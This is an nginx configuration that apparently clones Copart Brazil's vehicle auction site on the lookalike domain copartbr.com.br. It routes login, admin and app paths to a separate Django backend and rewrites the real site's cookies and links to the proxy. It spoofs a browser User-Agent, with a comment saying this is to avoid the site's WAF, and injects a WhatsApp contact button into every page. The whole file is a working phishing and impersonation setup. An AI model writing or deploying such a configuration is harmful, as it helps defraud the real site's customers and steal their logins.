map $http_upgrade $connection_upgrade {
    default upgrade;
    ''      close;
}

server {
    listen       ${PORT};
    server_name  copartbr.com.br www.copartbr.com.br;

    resolver 1.1.1.1 8.8.8.8 ipv6=off;

    client_max_body_size 20m;
    proxy_connect_timeout 30s;
    proxy_send_timeout 90s;
    proxy_read_timeout 90s;
    send_timeout 90s;

    # Substituições aplicadas apenas para respostas HTML
    gunzip on;

    # -------- Rotas que vão para o Django (login/registro/admin/bids) --------
    location ^~ /admin/ {
        proxy_pass ${DJANGO_UPSTREAM};
        proxy_http_version 1.1;
        proxy_ssl_server_name on;

        proxy_set_header Host $host;
        proxy_set_header X-Real-IP $remote_addr;
        proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
        proxy_set_header X-Forwarded-Proto $scheme;
        proxy_set_header Accept-Language "pt-BR,pt;q=0.9,en;q=0.8";
        proxy_set_header Accept-Encoding "";
        proxy_redirect off;

        # Corrige cookies
        proxy_cookie_domain ~\.copart\.com\.br $host;
        proxy_cookie_path ~*^/.* /;
    }

    location ^~ /app/ {
        proxy_pass ${DJANGO_UPSTREAM};
        proxy_http_version 1.1;
        proxy_ssl_server_name on;

        proxy_set_header Host $host;
        proxy_set_header X-Real-IP $remote_addr;
        proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
        proxy_set_header X-Forwarded-Proto $scheme;
        proxy_set_header Accept-Language "pt-BR,pt;q=0.9,en;q=0.8";
        proxy_set_header Accept-Encoding "";
        proxy_redirect off;

        # Corrige cookies
        proxy_cookie_domain ~\.copart\.com\.br $host;
        proxy_cookie_path ~*^/.* /;
    }

    # Adicione esta seção para lidar com login especificamente
    location ^~ /login/ {
        proxy_pass ${DJANGO_UPSTREAM};
        proxy_http_version 1.1;
        proxy_ssl_server_name on;

        proxy_set_header Host $host;
        proxy_set_header X-Real-IP $remote_addr;
        proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
        proxy_set_header X-Forwarded-Proto $scheme;
        proxy_set_header Accept-Language "pt-BR,pt;q=0.9,en;q=0.8";
        proxy_set_header Accept-Encoding "";
        
        # Corrige redirecionamentos
        proxy_redirect https://${UPSTREAM_HOST} /;
        proxy_redirect ${DJANGO_UPSTREAM} /;
        
        # Corrige cookies
        proxy_cookie_domain ~\.copart\.com\.br $host;
        proxy_cookie_path ~*^/.* /;
    }

    location ^~ /static/ {
        proxy_pass ${DJANGO_UPSTREAM};
        proxy_http_version 1.1;
        proxy_ssl_server_name on;

        proxy_set_header Host $host;
        proxy_set_header X-Real-IP $remote_addr;
        proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
        proxy_set_header X-Forwarded-Proto $scheme;
        proxy_set_header Accept-Language "pt-BR,pt;q=0.9,en;q=0.8";
        proxy_set_header Accept-Encoding "";
        proxy_redirect off;
    }

    # -------- Demais caminhos: proxy para Copart --------
    location / {
        proxy_pass https://${UPSTREAM_HOST};
        proxy_http_version 1.1;
        proxy_ssl_server_name on;

        proxy_set_header Host ${UPSTREAM_HOST};
        proxy_set_header X-Real-IP $remote_addr;
        proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
        proxy_set_header X-Forwarded-Proto $scheme;
        proxy_set_header Accept-Language "pt-BR,pt;q=0.9,en;q=0.8";
        proxy_set_header Upgrade $http_upgrade;
        proxy_set_header Connection $connection_upgrade;

        # Importante para evitar challenge/comportamento estranho do WAF
        proxy_set_header User-Agent "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36";
        proxy_set_header Referer https://${UPSTREAM_HOST}$request_uri;

        # Facilita sub_filter no HTML
        proxy_set_header Accept-Encoding "";
        
        # Corrige redirecionamentos
        proxy_redirect https://${UPSTREAM_HOST} /;
        proxy_redirect ${DJANGO_UPSTREAM} /;
        
        # Corrige cookies - regex corrigida
        proxy_cookie_domain ~\.copart\.com\.br $host;
        proxy_cookie_path ~*^/.* /;

        # Reescrita e injeção do botão (HTML)
        sub_filter_once off;
        sub_filter_types text/html;
        sub_filter 'https://www.copart.com.br' '';
        sub_filter 'https://copart.com.br' '';
        sub_filter '//www.copart.com.br' '/';
        sub_filter 'href="/' 'href="/';
        sub_filter 'src="/' 'src="/';
        sub_filter 'action="/' 'action="/';
        sub_filter '</body>' '<a href="${WHATSAPP_URL}" id="zap-fab" target="_blank" rel="noopener" style="position:fixed;right:18px;bottom:18px;z-index:2147483647;display:inline-flex;align-items:center;gap:8px;padding:12px 14px;background:#25D366;color:#fff;border-radius:999px;text-decoration:none;box-shadow:0 6px 20px rgba(0,0,0,0.2);font-family:system-ui,sans-serif;font-size:14px;"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 32 32" width="20" height="20" aria-hidden="true"><path fill="currentColor" d="M19.11 17.29c-.27-.13-1.6-.79-1.85-.88-.25-.09-.43-.13-.61.14-.18.27-.7.88-.86 1.06-.16.18-.32.2-.59.07-.27-.13-1.12-.41-2.14-1.31-.79-.7-1.32-1.56-1.48-1.82-.16-.27-.02-.41.11-.54.11-.11.25-.29.38-.43.13-.14.16-.25.25-.43.09-.18.05-.34-.02-.48-.07-.13-.61-1.46-.84-2-.22-.53-.45-.46-.61-.46-.16 0-.34-.02-.52-.02s-.48.07-.73.34c-.25.27-.95.93-.95 2.27s.98 2.64 1.12 2.82c.14.18 1.93 2.95 4.68 4.13.65.28 1.16.45 1.56.57.65.21 1.24.18 1.71.11.52-.08 1.6-.65 1.83-1.28.23-.63.23-1.17.16-1.28-.07-.11-.25-.18-.52-.31z"/><path fill="currentColor" d="M16 3C9.383 3 4 8.383 4 15c0 2.114.549 4.101 1.507 5.828L4 29l8.317-1.459C13.967 27.827 14.965 28 16 28c6.617 0 12-5.383 12-12S22.617 3 16 3zm0 22.5c-1.04 0-2.04-.188-2.965-.533l-.212-.08-4.923.863.86-4.766-.097-.167A9.47 9.47 0 0 1 6.5 15c0-5.238 4.262 9.5 9.5 9.5s9.5 4.262 9.5 9.5-4.262 9.5-9.5 9.5z"/></svg><span style="margin-left:6px">Fale no WhatsApp</span></a></body>';
    }
}
